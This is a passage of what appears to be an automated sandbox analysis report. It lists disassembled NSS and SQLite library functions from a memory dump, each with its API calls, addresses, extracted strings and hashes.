Part of subcall function 6C5EDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C5EDDB4

Part of subcall function 6C5307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C4C204A), ref: 6C5307AD
Part of subcall function 6C5307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4C204A), ref: 6C5307CD
Part of subcall function 6C5307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4C204A), ref: 6C5307D6
Part of subcall function 6C5307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C4C204A), ref: 6C5307E4
Part of subcall function 6C5307A0: TlsSetValue.KERNEL32(00000000,?,6C4C204A), ref: 6C530864
Part of subcall function 6C5307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C530880
Part of subcall function 6C5307A0: TlsSetValue.KERNEL32(00000000,?,?,6C4C204A), ref: 6C5308CB
Part of subcall function 6C5307A0: TlsGetValue.KERNEL32(?,?,6C4C204A), ref: 6C5308D7
Part of subcall function 6C5307A0: TlsGetValue.KERNEL32(?,?,6C4C204A), ref: 6C5308FB

TlsGetValue.KERNEL32 ref: 6C583A36
EnterCriticalSection.KERNEL32(0000001C), ref: 6C583A4E
PR_Unlock.NSS3(?), ref: 6C583A77
PR_SetError.NSS3(00000000,00000000), ref: 6C583A8F

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Value$CriticalSectionUnlock$Enter$calloc$ErrorLeave
String ID:
API String ID: 1642523270-0
Opcode ID: a37722170c9c8aee8980ae6a32ba8eea3f0fc15c129f4b2d5ac0d322cb3a432e
Instruction ID: 461c6277f8ca936185b186906a9e37867e62a2d6003fb3964c34d649b0589560
Opcode Fuzzy Hash: a37722170c9c8aee8980ae6a32ba8eea3f0fc15c129f4b2d5ac0d322cb3a432e
Instruction Fuzzy Hash: 87916675D01229DFDF00EFA9D884AAEBBB4FF09318F445169EC05A7711EB30A984CB91

Function 6C4CECC0 Relevance: 20.0, APIs: 8, Strings: 3, Instructions: 741COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C4CED0A
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C4CEE68
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C4CEF87
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?), ref: 6C4CEF98

Strings

%s at line %d of [%.10s], xrefs: 6C4CF492
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C4CF483
database corruption, xrefs: 6C4CF48D

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: _byteswap_ulong
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 4101233201-598938438
Opcode ID: b5db5952b9bc5a41d5b98a028e84a10e16b23864f80d1001a59ed5374e131278
Instruction ID: 2a96009beb6b7aee89dcebd2a1878178722913b18976eb9ddc819311c699c242
Opcode Fuzzy Hash: b5db5952b9bc5a41d5b98a028e84a10e16b23864f80d1001a59ed5374e131278
Instruction Fuzzy Hash: DB622438B052458FEB04CF65C480F9ABBF1BF45319F18419CD8465BBA2D739E886CB96

Function 6C567D60 Relevance: 18.3, APIs: 12, Instructions: 299COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?), ref: 6C567DDC

Part of subcall function 6C5A07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C548298,?,?,?,6C53FCE5,?), ref: 6C5A07BF
Part of subcall function 6C5A07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C5A07E6
Part of subcall function 6C5A07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C5A081B
Part of subcall function 6C5A07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C5A0825

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C567DF3
PK11_PBEKeyGen.NSS3(?,00000000,00000000,00000000,?), ref: 6C567F07
PK11_GetPadMechanism.NSS3(00000000), ref: 6C567F57
PK11_UnwrapPrivKey.NSS3(?,00000000,00000000,?,0000001C,00000000,?,?,?,00000000,00000130,00000004,?), ref: 6C567F98
PK11_FreeSymKey.NSS3(?), ref: 6C567FC9
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C567FDE
PK11_PBEKeyGen.NSS3(?,?,00000000,00000001,?), ref: 6C568000

Part of subcall function 6C589430: SECOID_GetAlgorithmTag_Util.NSS3(00000000,?,?,00000000,00000000,?,6C567F0C,?,00000000,00000000,00000000,?), ref: 6C58943B
Part of subcall function 6C589430: SECOID_FindOIDByTag_Util.NSS3(00000000,?,?), ref: 6C58946B
Part of subcall function 6C589430: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?), ref: 6C589546

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C568110
PK11_FreeSymKey.NSS3(00000000), ref: 6C56811D
PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6C56822D
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C56823C

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: K11_Util$FindItem_Tag_Zfree$ErrorFreeHashLookupPublicTable$AlgorithmConstDestroyImportMechanismPrivUnwrap
String ID:
API String ID: 1923011919-0
Opcode ID: e7ba9e0c2139409786f9fa8355648a357b58bc876408ade23776f931c03b4410
Instruction ID: 21b344dd429cabc2c7ec4a8141a4a0f950c52606be23cdfcb2d099cb502cbfa4
Opcode Fuzzy Hash: e7ba9e0c2139409786f9fa8355648a357b58bc876408ade23776f931c03b4410
Instruction Fuzzy Hash: 87C17FB1D40259DBEB21CF25CC40FEAB7B8AF05348F0085E5E91DA6A51E7319E89CF91

Function 6C4DAEC0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000002,?,6C5FCF46,?,6C4CCDBD,?,6C5FBF31,?,?,?,?,?,?,?), ref: 6C4DB039
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C5FCF46,?,6C4CCDBD,?,6C5FBF31), ref: 6C4DB090
sqlite3_free.NSS3(?,?,?,?,?,?,6C5FCF46,?,6C4CCDBD,?,6C5FBF31), ref: 6C4DB0A2
CloseHandle.KERNEL32(?,?,6C5FCF46,?,6C4CCDBD,?,6C5FBF31,?,?,?,?,?,?,?,?,?), ref: 6C4DB100
sqlite3_free.NSS3(?,?,00000002,?,6C5FCF46,?,6C4CCDBD,?,6C5FBF31,?,?,?,?,?,?,?), ref: 6C4DB115
sqlite3_free.NSS3(?,?,?,?,?,?,6C5FCF46,?,6C4CCDBD,?,6C5FBF31), ref: 6C4DB12D

Part of subcall function 6C4C9EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6C4DC6FD,?,?,?,?,6C52F965,00000000), ref: 6C4C9F0E
Part of subcall function 6C4C9EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C52F965,00000000), ref: 6C4C9F5D

Strings

`el, xrefs: 6C4DB0DF

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
String ID: `el
API String ID: 3155957115-3349905385
Opcode ID: 37481a1d9e3a60e7d986d44a9bdf8391e0e90b478f8d6268d1612630dd5bfb0d
Instruction ID: 6d0bea0639094f19f33ff71deeb381d33f9d962ae1e3f1f99e2b475e709f30b9
Opcode Fuzzy Hash: 37481a1d9e3a60e7d986d44a9bdf8391e0e90b478f8d6268d1612630dd5bfb0d
Instruction Fuzzy Hash: 8291DCB0A042028FDB04EF66D894F6AB7B1FF46309F16462DE41697B50EB31F845CB96

Function 6C570EC0 Relevance: 16.7, APIs: 11, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_PubDeriveWithKDF.NSS3 ref: 6C570F8D
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C570FB3
PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C571006
PK11_FreeSymKey.NSS3(?), ref: 6C57101C
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C571033
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C57103F
PK11_FreeSymKey.NSS3(00000000), ref: 6C571048
memcpy.VCRUNTIME140(?,?,?), ref: 6C57108E
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C5710BB
memcpy.VCRUNTIME140(?,00000006,?), ref: 6C5710D6
memcpy.VCRUNTIME140(?,?,?), ref: 6C57112E

Part of subcall function 6C571570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6C5708C4,?,?), ref: 6C5715B8
Part of subcall function 6C571570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6C5708C4,?,?), ref: 6C5715C1
Part of subcall function 6C571570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C57162E
Part of subcall function 6C571570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C571637

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
String ID:
API String ID: 1510409361-0
Opcode ID: 63804f44a18d0fd097ab74da7c6fc2246dfc218b7b53bb9ad3897927e4efbbad
Instruction ID: 51dc25d3157696a7b207201ad65c04fcf1de338669a49c303dbe49da382a211e
Opcode Fuzzy Hash: 63804f44a18d0fd097ab74da7c6fc2246dfc218b7b53bb9ad3897927e4efbbad
Instruction Fuzzy Hash: A071C0B1A00245CFDB14CFA5CC94A6BB7F4BF88318F148629E90D9B711E731E994CBA1

Function 6C591CE0 Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 401COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000020), ref: 6C591F19
memcpy.VCRUNTIME140(?,?,00000020), ref: 6C592166
memcpy.VCRUNTIME140(?,?,00000010), ref: 6C59228F
memcpy.VCRUNTIME140(?,?,00000010), ref: 6C5923B8
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C59241C

Strings

token, xrefs: 6C591F2C
manufacturer, xrefs: 6C592179
model, xrefs: 6C5923CB, 6C5923EC
serial, xrefs: 6C5922A2

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: memcpy$Error
String ID: manufacturer$model$serial$token
API String ID: 3204416626-1906384322
Opcode ID: 630ee1332599960ccc5c1cb88958a38b4921b3a5f92c65a0e3f2468da72d655a
Instruction ID: 25d5b350dcfc9fe0469eac42d23e9a67f4066d3aa2422547e96617244ee9a3a8
Opcode Fuzzy Hash: 630ee1332599960ccc5c1cb88958a38b4921b3a5f92c65a0e3f2468da72d655a
Instruction Fuzzy Hash: 77021072E0C7CC6EFB318671CC4C3D76AE49B45328F4C16AEC6DE46683C3A859499752

Function 6C4D0FE0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 227COMMON

Download Yara Rule

APIs

Part of subcall function 6C4CCA30: EnterCriticalSection.KERNEL32(?,?,?,6C52F9C9,?,6C52F4DA,6C52F9C9,?,?,6C4F369A), ref: 6C4CCA7A
Part of subcall function 6C4CCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C4CCB26

memset.VCRUNTIME140(00000000,00000000,00000C0A), ref: 6C4D103E
EnterCriticalSection.KERNEL32(?), ref: 6C4D1139
LeaveCriticalSection.KERNEL32(?), ref: 6C4D1190
sqlite3_free.NSS3(00000000), ref: 6C4D1227
sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,00000001,0000BCFE), ref: 6C4D126E
sqlite3_free.NSS3(?), ref: 6C4D127F

Strings

winAccess, xrefs: 6C4D129B
Pel, xrefs: 6C4D109E
delayed %dms for lock/sharing conflict at line %d, xrefs: 6C4D1267

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: CriticalSection$EnterLeavesqlite3_free$memsetsqlite3_log
String ID: Pel$delayed %dms for lock/sharing conflict at line %d$winAccess
API String ID: 2733752649-2231841629
Opcode ID: 453e0e9cb81fe761f35bcc5b2c9a92e87917d7503ed174018a85c4f93d83b3cd
Instruction ID: 27f25edd76f35c9116ecd892c848e72235250012a062ea03a4449967f4081a14
Opcode Fuzzy Hash: 453e0e9cb81fe761f35bcc5b2c9a92e87917d7503ed174018a85c4f93d83b3cd
Instruction Fuzzy Hash: 6B71F8357042019BEB04EF66ECE5E6E33B5FB8A335F150629ED1297A80DB31F841C696

Function 6C596C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C541C6F,00000000,00000004,?,?), ref: 6C596C3F

Part of subcall function 6C5EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5EC2BF

PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C541C6F,00000000,00000004,?,?), ref: 6C596C60
PR_ExplodeTime.NSS3(00000000,6C541C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C541C6F,00000000,00000004,?,?), ref: 6C596C94

Strings

gfff, xrefs: 6C596D9C
gfff, xrefs: 6C596CFD
gfff, xrefs: 6C596CF5
gfff, xrefs: 6C596D66
gfff, xrefs: 6C596D30

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Alloc_ArenaErrorExplodeTimeUtilValue
String ID: gfff$gfff$gfff$gfff$gfff
API String ID: 3534712800-180463219
Opcode ID: 9a526355a0ce040c16c855cc922f31b7e6fd604a1b0f97b0a9d2d1d468bcf574
Instruction ID: 07343829f2af2281ecaf3234a8ee5f3aa60f9cd9e63789ec7b1d307128c315f5
Opcode Fuzzy Hash: 9a526355a0ce040c16c855cc922f31b7e6fd604a1b0f97b0a9d2d1d468bcf574
Instruction Fuzzy Hash: 97513B72B016494FC708CDADDC526DEB7DAABE4310F48C23AE842DB781DA38D906C751

Function 6C610F20 Relevance: 15.4, APIs: 3, Strings: 7, Instructions: 394stringCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,-00000001), ref: 6C611027
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C6110B2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C611353

Strings

'%.*q', xrefs: 6C611217, 6C611292
%lld, xrefs: 6C61114B
-- , xrefs: 6C610FF5
%02x, xrefs: 6C6112F6
$, xrefs: 6C6112A0
zeroblob(%d), xrefs: 6C611223
NULL, xrefs: 6C61119E

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: memcpy$strlen
String ID: $$%02x$%lld$'%.*q'$-- $NULL$zeroblob(%d)
API String ID: 2619041689-2155869073
Opcode ID: f54f7a00dbd857da0cad1806a21e717360c8fec5d6be28204b885854d4b1880f
Instruction ID: db16cbcf392e5482f6023c8b1bc3996c74a9784b2790b00ec19e74fa5b3f46e0
Opcode Fuzzy Hash: f54f7a00dbd857da0cad1806a21e717360c8fec5d6be28204b885854d4b1880f
Instruction Fuzzy Hash: AAE19D71A0C380DFD704CF18C880AABBBF1AF96359F14891DE99587B51E771E845CB46

Function 6C618FB0 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 289COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C618FEE
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6190DC
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C619118
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C61915C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6191C2
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C619209

Strings

UUUU, xrefs: 6C619255
3333, xrefs: 6C61925E

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: _byteswap_ulong$Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: 3333$UUUU
API String ID: 1967222509-2679824526
Opcode ID: dcc22dec3608dae6fb5ad231ca0b0e0b312255f0d69d52c810effadd7ae6bcde
Instruction ID: 712b76160d26a88d503a3fc7df09336bba56af442205332ea7099d5be8984a4c
Opcode Fuzzy Hash: dcc22dec3608dae6fb5ad231ca0b0e0b312255f0d69d52c810effadd7ae6bcde
Instruction Fuzzy Hash: 20A19E72E001159FDB08CF69CC80BEEB7B5BB89329F194169D905A7741E736EC11CBA4

Function 6C5ABD30 Relevance: 13.6, APIs: 9, Instructions: 102COMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6C5ABD48
NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6C5ABD68
NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6C5ABD83
NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6C5ABD9E
NSS_GetAlgorithmPolicy.NSS3(0000000A,?), ref: 6C5ABDB9
NSS_GetAlgorithmPolicy.NSS3(00000007,?), ref: 6C5ABDD0
NSS_GetAlgorithmPolicy.NSS3(000000B8,?), ref: 6C5ABDEA
NSS_GetAlgorithmPolicy.NSS3(000000BA,?), ref: 6C5ABE04
NSS_GetAlgorithmPolicy.NSS3(000000BC,?), ref: 6C5ABE1E

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: AlgorithmPolicy
String ID:
API String ID: 2721248240-0
Opcode ID: ff3c7336882942de908d5bbe20de1c4ca0ea8afb7374c5728046085fef83476e
Instruction ID: a5bf2e3080d2668d8d568ae65e34c80887dd1e351f442409154d917dbf187e53
Opcode Fuzzy Hash: ff3c7336882942de908d5bbe20de1c4ca0ea8afb7374c5728046085fef83476e
Instruction Fuzzy Hash: 4A219376E1429D9BFB006AD79C42B8F36749BD274DF080114E917AE641E720D81A86EA

Function 6C658D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C6A14E4,6C60CC70), ref: 6C658D47
PR_GetCurrentThread.NSS3 ref: 6C658D98

Part of subcall function 6C530F00: PR_GetPageSize.NSS3(6C530936,FFFFE8AE,?,6C4C16B7,00000000,?,6C530936,00000000,?,6C4C204A), ref: 6C530F1B
Part of subcall function 6C530F00: PR_NewLogModule.NSS3(clock,6C530936,FFFFE8AE,?,6C4C16B7,00000000,?,6C530936,00000000,?,6C4C204A), ref: 6C530F25

PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6C658E7B
htons.WSOCK32(?), ref: 6C658EDB
PR_GetCurrentThread.NSS3 ref: 6C658F99
PR_GetCurrentThread.NSS3 ref: 6C65910A

Strings

%u.%u.%u.%u, xrefs: 6C658E74

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
String ID: %u.%u.%u.%u
API String ID: 1845059423-1542503432
